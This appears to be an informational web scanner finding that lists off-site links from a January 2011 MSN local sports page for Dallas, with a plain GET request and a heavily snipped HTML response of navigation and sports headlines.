http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730
http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669
http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911
http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-
http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010
http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506
http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195
http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645
http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410
http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989
http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187
http://msn.foxsports.com/cfb/team?categoryId=86068
http://msn.foxsports.com/cfb/team?categoryId=86111
http://msn.foxsports.com/cfb/team?categoryId=86112
http://msn.foxsports.com/cfb/team?categoryId=86127
http://msn.foxsports.com/cfb/team?categoryId=86128
http://msn.foxsports.com/cfb/team?categoryId=86138
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138
http://msn.foxsports.com/cfb/teamStats?categoryId=86068
http://msn.foxsports.com/cfb/teamStats?categoryId=86111
http://msn.foxsports.com/cfb/teamStats?categoryId=86112
http://msn.foxsports.com/cfb/teamStats?categoryId=86127
http://msn.foxsports.com/cfb/teamStats?categoryId=86128
http://msn.foxsports.com/cfb/teamStats?categoryId=86138
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif
http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png
http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif
http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png
http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png
http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png
http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif
http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/foxsoccer/mls
http://msn.foxsports.com/foxsoccer/mls/standings
http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377
http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/mlb/standings
http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608
http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288
http://msn.foxsports.com/mlb/story/Baltimore-Orioles-Vladimir-Guerrero-contract-offer-012911
http://msn.foxsports.com/mlb/story/Francicso-signs-oneyear-deal-with-Blue-Jays-27438403
http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511
http://msn.foxsports.com/mlb/story/Padres-promote-Chris-Gwynn,-hire-Dave-Roberts
http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420
http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List
http://msn.foxsports.com/mlb/team/houston-astros
http://msn.foxsports.com/mlb/team/houston-astros/schedule
http://msn.foxsports.com/mlb/team/houston-astros/stats
http://msn.foxsports.com/mlb/team/texas-rangers
http://msn.foxsports.com/mlb/team/texas-rangers/schedule
http://msn.foxsports.com/mlb/team/texas-rangers/stats
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nba/standings
http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711
http://msn.foxsports.com/nba/story/Dallas-Mavericks-take-down-Atlanta-Hawks--12911
http://msn.foxsports.com/nba/story/HawksMavericks-Preview-77679106
http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154
http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514
http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911
http://msn.foxsports.com/nba/story/Spurs-hand-Jazz-6th-straight-loss-012611
http://msn.foxsports.com/nba/story/Weighing-Ws-and-Ls-vs-numbers-in-AllStar-votes-33069128
http://msn.foxsports.com/nba/team/dallas-mavericks
http://msn.foxsports.com/nba/team/dallas-mavericks/schedule
http://msn.foxsports.com/nba/team/dallas-mavericks/stats
http://msn.foxsports.com/nba/team/houston-rockets
http://msn.foxsports.com/nba/team/houston-rockets/schedule
http://msn.foxsports.com/nba/team/houston-rockets/stats
http://msn.foxsports.com/nba/team/san-antonio-spurs
http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule
http://msn.foxsports.com/nba/team/san-antonio-spurs/stats
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nfl/standings
http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071
http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753
http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786
http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089
http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692
http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611
http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811
http://msn.foxsports.com/nfl/story/pro-bowl-players-hoping-game-stays-in-hawaii-012911
http://msn.foxsports.com/nfl/team/dallas-cowboys
http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule
http://msn.foxsports.com/nfl/team/dallas-cowboys/stats
http://msn.foxsports.com/nfl/team/houston-texans
http://msn.foxsports.com/nfl/team/houston-texans/schedule
http://msn.foxsports.com/nfl/team/houston-texans/stats
http://msn.foxsports.com/nhl
http://msn.foxsports.com/nhl/standings
http://msn.foxsports.com/nhl/story/Alex-Ovechkin-Zdeno-Chara-shine-at-NHL-SuperSkills-012911
http://msn.foxsports.com/nhl/story/Dallas-Stars-Jamie-Benn-Tom-Wandell-out-with-upper-body-injuries-012611
http://msn.foxsports.com/nhl/story/OilersStars-Preview-96456130
http://msn.foxsports.com/nhl/story/Stars-3-Oilers-1-38835353
http://msn.foxsports.com/nhl/team/dallas-stars
http://msn.foxsports.com/nhl/team/dallas-stars/schedule/
http://msn.foxsports.com/nhl/team/dallas-stars/stats/
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.foxsports.com/wcbk
http://msn.foxsports.com/wcbk/schedule
http://msn.foxsports.com/wcbk/standings
http://msn.foxsports.com/wcbk/statsTeam
http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840
http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229
http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829
http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331
http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110
http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731
http://msn.foxsports.com/wcbk/story/National-Team-Leaders
http://msn.foxsports.com/wcbk/story/National-Team-Leaders3
http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251
http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731
http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002
http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977
http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171
http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435
http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644
http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027
http://msn.foxsports.com/wnba
http://msn.foxsports.com/wnba/schedule
http://msn.foxsports.com/wnba/standings
http://msn.foxsports.com/wnba/stats
http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762
http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864
http://msn.foxsports.com/wnba/story/Silver-Stars-92,-Mercury-91
http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP
http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP
http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP
http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP
http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406226&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&resize=false
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /sports.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=662497c7dbd845c1a593999772e9757b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EFC5859DD3FC4353B27260146D565E04; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406226&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys" title="Dallas Cowboys"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png" alt="Dallas Cowboys logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys">Dallas Cowboys</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786">Eagles WR Jackson replaced by Austin in Pro Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089">Goodell skips Pro Bowl to focus on new contract</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692">Howdy! A Big D welcome to Packers, Steelers</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611">Cowboys remove Garrett's interim tag</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/houston-texans" title="Houston Texans"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png" alt="Houston Texans logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/houston-texans">Houston Texans</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/pro-bowl-players-hoping-game-stays-in-hawaii-012911">Players hoping Pro Bowl stays in Hawaii</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811">First-time Pro Bowlers soaking it all in</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753">AP's NFL Awards on NFL Network during SB week</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071">AP source: Texans hire Herring to coach LBs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86111" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86111">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989">Unbeaten TCU stops Wisconsin 21-19 in Rose Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-">TCU wins one for the little guys </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187">Wisconsin-TCU Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669">Rose Bowl is more than Badgers' size, Frogs' speed</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86111">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86138" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86138">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911">Ponder leads South to Senior Bowl win</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Ponder-South-win-Senior-Bowl-2410-10241756">Ponder, South win Senior Bowl, 24-10</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143">AP All-America Team, List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010">Texas DE Acho wins scholar-athlete award</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86138">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86128" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86128">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111">Appeals court rules against Leach</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711">NCAA: Texas Tech broke recruiting rules</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411">Leach thought he was Terps match</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506">Texas Tech 45, Northwestern 38</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86128">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86112" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86112">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010">Army caps first winning season since '96</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926">Army-SMU Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410">UCF wins Conference USA championship</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645">UCF defeats SMU 17-7 to win Conference USA title</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86112">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86068" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86068">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018">Kansas St. 49, North Texas 41</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865">No. 13 Virginia Tech 37, Virginia 7</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195">Tuneup for Hokies is Cavaliers' bowl game</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730">Reserves key to titles, bowls for some ACC teams</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86068">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
